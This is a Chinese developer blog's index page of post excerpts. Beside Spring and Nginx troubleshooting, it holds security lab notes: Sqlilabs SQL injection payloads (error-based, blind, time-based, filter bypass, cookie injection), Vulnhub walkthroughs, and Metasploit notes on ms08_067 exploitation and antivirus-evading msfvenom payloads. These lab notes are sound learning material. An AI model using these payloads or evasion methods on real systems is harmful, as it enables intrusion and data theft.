自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

KAKA的博客

HDMORE

  • 博客(208)
  • 收藏
  • 关注

原创 项目部署在Windows,Nginx在Linux无法反向代理的问题

折腾许久,找到原因:192.168.0.106 也就是 Windows 这台机器的防火墙拦截了局域网内的请求。需要开启防火墙,减弱安全防护并配置入站和出站规则。现配置 nginx.conf 反向代理:proxy_pass http://192.168.0.106:8201。Nginx服务器部署在Linux虚拟机中,ip地址为:http://192.168.0.103:9001。项目部署在windows,ip地址为:http://192.168.0.106:8201。

2023-01-04 15:37:08 611 1

原创 使用 JackSon 报 500 错误...

使用 Jackson 无法直接使用,因为会说 ObjectMapper 不存在,为啥捏?因为你的 Artifacts 中并没有引入 Jackson 依赖,当你在 pom.xml 中引入了新的依赖之后呢,你需要 ctrl + shift + alt + s ---> 然后找到 Artifact 然后将依赖右键选择 put into /WEB-INF/lib然后重启应用,否则你这个 ObjectMapper 是找不到的。

2022-11-12 03:44:21 330

原创 Redis 哨兵模式网络问题:Unable Connect

Redis 哨兵模式网络问题:Unable Connect

2022-08-27 21:27:43 1385 1

原创 Caused by: java.lang.IllegalStateException: Incompatible fallbackFactory instance. Fallback/fallback

Caused by: java.lang.IllegalStateException: Incompatible fallbackFactory instance. Fallback/fallbackFactory of type class com.kk.clients.fallbackfactory.UserClientFallbackFactory is not assignable to interface org.springframework.cloud.openfeign.FallbackFa

2022-08-23 12:29:21 934

转载 Hexo 分页相关 转载

Hexo

2022-08-11 23:30:35 156

原创 Springboot拦截器不生效的问题

1. @Component 和 @Confuguration 都已经写好2. 实现 WebMvcConfigurer 接口的实现类也已经写好,并且在添加拦截器的地方没使用 new 对象的方式3. addPathPatterns 配置为:"/admin/**",excludePathPatterns 配置为:"/admin/login", "/admin.newError"4. 在 application.yaml 主配置文件中配置的路径是:"/admin"5. HandlerIntercep

2022-01-07 16:23:10 1176

原创 启动SpringBoot后target没有yaml配置文件导致的Bug

Bug复现:nested exception is org.springframework.boot.autoconfigure.jdbc.DataSourceProperties$DataSourceBeanCreationException: Failed to determine a suitable driver class起初一直以为是配置文件本身的问题,直到看到target没有该yaml文件,以前一直都是只引入src/main/java中的内容,并无引入resources文件夹中

2022-01-07 14:52:12 4094 3

原创 Error creating bean with name ‘org.springframework.cache.interceptor.CacheInterceptor#0‘

造成该错误的原因可能有:1. JDK 版本不对2. springmvc的配置文件<mvc:annotation-driven>或者<context:component-scan>引入属性不对能改即可

2021-11-08 17:11:41 414

原创 Exception in thread “main“ org.springframework.beans.factory.BeanCreationException: Error creating

起初一直以为是配置文件或者代码写错了,但是一直没有找到方法,后面尝试点击:Edit-Configuration发现我的JDK版本怎么是16!!!遂改成1.8版本【可能是我在创建项目的时候选择了默认版本。。。】然后就这样解决掉了这个bug,日后一定注意使用的工具和JDK版本是否对应......

2021-11-08 12:07:51 1058

原创 Caused by: org.springframework.beans.factory.NoSuchBeanDefinitionException: No qualifying bean of ty

报错信息如下:Caused by: org.springframework.beans.factory.NoSuchBeanDefinitionException: No qualifying bean of type 'com.xxx.service.AdminService' available: expected at least 1 bean which qualifies as autowire candidate. Dependency annotations: {@org.springfr

2021-10-22 17:20:11 2432 3

原创 springmvc流程

​​​​​​​

2021-10-13 16:34:42 259

原创 对JS引用数据类型在堆栈中的一点小理解

晚上敲代码的时候遇到 call() 对 call() 究竟是如何改变 this 对象的指向的来了劲。事情的起因还得从今晚想自定义实现 new 关键字的功能。结合构造函数创建一个实例对象,欲想创建实例对象,需要改变其 this 指向,自然就想到了三兄弟 call()、bind() 和 apply(),但它们又是怎么改变 this 指向的呢?深层次的原因就要从引用数据类型在对堆栈中是什么样子的。下面是一段代码,我把我的想法全部写在了注释上面,如果有什么不同的见解可以跟我交流。/** * newInsta

2021-04-17 01:51:35 290

原创 Vulnhub-djinn3

与 1 和 2 相同,开机即可得到 djinn3 的 IP地址:192.168.67.14获取相关信息:nmap -A -p- 192.168.67.1422 ---> ssh --> open80 ---> http --> open5000 ---> http --> open31337 ---> open --> open探测 80 端口先看看刚刚 nmap 有没有扫出什么东西:可得到服务端是 lighttp.

2020-07-18 20:19:49 1087

原创 Vulnhub-djinn2

欢迎来到 djinn2 的世界,首先我们得对企业环境些许了解,否则你将无法顺畅地做该练习,在企业中一般都会有备份和邮箱,所以在该练习中,要注意备份和邮箱,一般放置的目录为 /var 目录,除此之外,作者还给我们一个小提示,就是在 5000 端口服务中有 RCE 存在,我们需要利用它,除此之外,介绍一下 MSF 中的 web_delivery 模块,它用于在我们有一定的访问权限,但是没有 shell 的情况下,让咋们开始吧:Dnmap -A -p- 192.168.67.33共开放了 5 个端口,2

2020-07-15 16:30:07 493

原创 Sqlilabs-28a

28a 在这里????

2020-07-14 12:28:35 197

原创 Sqlilabs-28

因为是 Winodws 那就盲注吧,这跟 26a27a 关卡一样, payload 改改就可以用了,这一关同样把报错信息给过滤了,所以报错注入用不了:–查表http://sqlilabs/Less-28/?id=1')and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(tabl

2020-07-14 12:27:14 418

原创 sqlilabs-27a

又是盲注,只需要把 26a 关卡 payload 改改就可以用了,这一关把报错信息给过滤了,所以报错注入用不了:–查表http://sqlilabs/Less-27a/?id=1"and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(table_rows=14))a),1,1))

2020-07-14 12:26:32 374

原创 Sqlilabs-27

题目告诉我们本关卡过滤了 union 和 select,其实还有空格,这一关也过滤了尝试双写绕过,不行那就大小写绕过,成功–查表http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)))and'1'='1–查列http://s.

2020-07-14 12:26:01 784

原创 Sqlilabs-26

来到了 Sqlilabs 大魔王的第 26 关关卡…来到页面就看到大大的,“你的所有空格和过滤符都属于我们“,这难得到机智的你吗?在此说下常见的绕过方法有:(本来这应该在 25 关卡就说的,忘了…)双写绕过大小写绕过编码绕过,如:hex || URL注释符绕过,如:/!select/替换:如 and 可替换为 && ,or 可替换为 ||空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代有了上述的神兵利器,那就很

2020-07-14 12:25:32 2255 2

原创 Sqlilabs-25a

本关卡和 25 关的区别在于连单引号都省去了…http://sqlilabs/Less-25a/?id=1 报错http://sqlilabs/Less-25a/?id=1--+ 正常http://sqlilabs/Less-25a/?id=1 ordery by 3--+ 报错原因是 order 里面含有 or双写绕过:oorrderhttp://sqlilabs/Less-25a/?id=1 oorrder by 3--+ 正确http://sqlilabs/Less-2.

2020-07-14 12:25:00 281

原创 Sqlilabs-25

这一关来到了 25 关一进入界面就看到大大的你的所有 ‘or’ 和 ‘and’ 都属于我们,这就需要我们绕过了…http://sqlilabs/Less-25/?id=1' 报错http://sqlilabs/Less-25/?id=1'--+ 正常http://sqlilabs/Less-25/?id=1' ordery by 3--+ 报错原因是 order 里面含有 or双写绕过:oorrderhttp://sqlilabs/Less-25/?id=1' oorrder

2020-07-14 12:24:30 304

原创 Sqlilabs-24

这一关来到了二次注入的世界:所谓的二次注入简单一句话:就是你在一个身份下面可以改其它身份的密码(数据)不过在此之前想尝试一下报错注入在修改密码可不可以成功:???让我更聪明更努力点???ok,fine…那就二次注入吧…后台的修改密码的 SQL 语句如下:试想,如果在注册的时候,就写入一个带过滤后边 SQL 与的字符的用户名会怎么样呢?比如:admin’#SQL 语句就变成了:UPDATE users SET PASSWORD='$pass' where username= 'admi

2020-07-14 12:24:00 744

原创 Sqlilabs-23

第 23 关对注入字符做了正则表达式的过滤,所以需要在引号上下功夫:http://sqlilabs/Less-23/?id=1' and '1知道了原理构造起来就很简单了:–查表http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1简化:.

2020-07-14 12:23:31 544 1

原创 vulnhub-djinn1

获取 IP 地址,目标机器已显示:获取信息:nmap -A -p- 192.168.67.108得到 4 个端口:21 --> FTP --> open --> 猜测有文件可获取22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过]1337 --> SOME --> open --> 使用 nc 连接7331 --> HTTP --> open --> 网页21 --> FTP

2020-07-14 12:21:01 427 1

原创 Vulnhub-Basilic

灰常有意思的一次训练,需要对 python 沙箱逃逸有一定程度的理解,让我们开始游戏吧~[注:从源地址下载出得知需要拿到 4 个 flag]利用 namp 扫描获取目标 IP 地址:nmap -sn 192.168.67.1/24继续获取目标的相关开放端口等信息:namp -A -p- 192.168.67.18可以看到下列信息:http服务对应的端口是 5000 ,而不是 80,其次还开放了 22 --> ssh 服务,我们登陆到 web 页面游玩下~点击 contact me,得到

2020-07-10 12:34:31 531

原创 Sqlilabs-22

这里来到了第一阶段的最后一关:22 关其实跟 21 关一样,只不过变成了双引号 " 而已,直接上菜吧o( ̄▽ ̄)ブuname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM=uname=admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))#怎么猜单引号加括号,这里当你构造好 payload pos

2020-07-09 16:51:54 378

原创 Sqlilabs-21

来到了第 21 关,看着 21 关,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文…这一关卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 关一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样…Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入]uname=YWRtaW4nKSBhbm

2020-07-09 16:51:24 594

原创 Sqlilabs-20

十大关一关卡,小试牛刀来到了第 20 关:本关还是在 HTTP HEADRE 做文章,具体为 COOKIE先输入正确的用户名和密码,进入界面看看:通过观察我们可以看到具体的 payload 该如何构造把 hackbar 的 cookie 栏调出来:–查表uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=databas

2020-07-09 16:50:57 579

原创 Sqlilabs-19

第 19 关跟第 18 关类似,User-Agent 改成了 Referer 改造注入–Referer“浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL”同样的,这一关对 usernanme 和 password 都进行了 check_inputhackbar 制作针对 referer 的 payload:–查表1' and extractvalue(1,concat(0x7e,(select table_name from information_

2020-07-09 16:50:20 337

原创 Sqlilabs-18

来到了 18 关18 关同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input再看看后台 SQL 语句的构造:insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)

2020-07-09 16:49:50 857

原创 Metasploit Framework —— Msfvenom

身份证msfvenom 是 msfpayload 爸爸和 msfencode 妈妈生的仔仔,是两个的结合体,继承了两者的优良品德,生日是 2015 年 6 月 8 日,刚过不久…用武之地免杀 : msfvenom 结合 excellent 编码器等生成的 payload 具有一定的免杀效果客户端渗透 : 在无法突破网络边界的情况下(IDS等)转而进行客户端的渗透,此法常见于社会工程学攻击,进而渗透到线上的业务网络,具体较常见的形式有:图片 邮件 PDF DOC WEB站点…诱骗人家下载执行 payl

2020-07-09 16:47:51 379 1

原创 Metasploit Framework —— Payload

这里也是直接以练习为主,学习如何使用 payload:!!!附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode!!!这里我起初用的 payload 是 payload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/re

2020-07-09 16:46:37 278

原创 Metasploit Framework —— Exploit

介绍 Exploit 模块 ——这里就直接以一台 windows xp sp3 为例,针对其 ms08_67 漏洞进行攻击,学习如何使用 exploit 模块:搜索:search ms08_067使用:use exploit/windows/smb/ms08_067_netapi查看:show options[注意这里 payload 已经默认是反弹 shell,同理可以 show payloads set payload xxx]设置目标:set RHOSTS 192.168.67.1

2020-07-09 16:46:07 260

原创 Metasploit Framework —— Database Backend

在渗透测试的过程当中,无论是收集到信息,还是摸索到的,都是非常重要的数据,所以有一个数据库能够存放以此达到快速检阅等目的的重要性自然就知道了,MSF 也考虑到了这一点,所以特此准备了一系列关于数据库后端的命令MSF 中默认的数据库系统为 postgresql,故在开始之前,我们得先开启 postgresql service开启 postgresql 服务:service postgresql start查看 postgresql 状态:service postgresql status初始化一个

2020-07-09 16:42:43 166

原创 Metasploit Framework —— Basic

这里介绍的就是 MSF 的一些简单的基本使用,创始人 HD 摩尔曾说谁为 MS 写教程其实就是自作自受,纯属找虐,因为真的变化太快了,所以这里所写使一些基本功能,其余的需要自己去摸索…!!!但虽然这样,还是有人写,目前被作者称赞过的最好的一本教材就是《Metasploitable 渗透测试指南》!!!由 offensive security 即 kali 官方所做,国内译本是清华博士诸葛建伟带队翻译而成的!!!Metasploit Framework --> MSF --> 渗透测试

2020-07-09 16:41:39 234

原创 Sqlilabs-17

来到了 17 关,从这关开始刚学习需要借助源码来配合学习,本关学习内容是 update 内容从源码中可以看到,开发者的意图流程是:首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的…继续往下看源码,你会发现 username 身上加了个check_input,转到

2020-07-07 11:59:00 827 1

原创 Sqlilabs-16

相较于第 15 关,单引号变成了双引号 + 括号–查列uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit–查用户名uname=admin") and if(ascii(substr((select group_conca

2020-07-07 11:58:29 437

原创 Sqlilabs-15

这一关来到了第 15 关,值得注意的是,这一关是布尔和时间盲注的结合关,很好玩哦~因为有时间盲注,这里就直接上菜了,下面是几个例子–查表uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit–查列uname=admin' a

2020-07-07 11:57:56 799 1

原创 简单的漏洞扫描器

构造思路:1.socket 连接获取 Banner --> 2.与存在漏洞的 Banner 集合进行对比中间细节:1.需要判断用户所给参数是否存在且是否有读权限2.需要判断 Banner 是否存在,处理异常学习 os sys socket 各个模块的基本使用直接上代码:#!/usr/bin/python3`#-*- coding:utf-8 -*-`import socketimport osimport sys# 获取 Banner信息def ret

2020-07-07 11:51:37 437

原创 Sqlilabs-14

这里来到了第 14 关,题目是个忽悠,说是单引号+括号,整的跟 13 关一样但其实就是个大忽悠在 Hackbar 上做注入,这一关 hackbar 又可以用了…这是属于哪波操作?uname=admin'&passwd=111&submit=submit 回显正常[这时你就知道题目忽悠人了]uname=admin"&passwd=111&submit=submit 回显报错[说明是双引号的人,没错了]uname=admin"#&passwd=111

2020-07-07 00:03:40 475

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除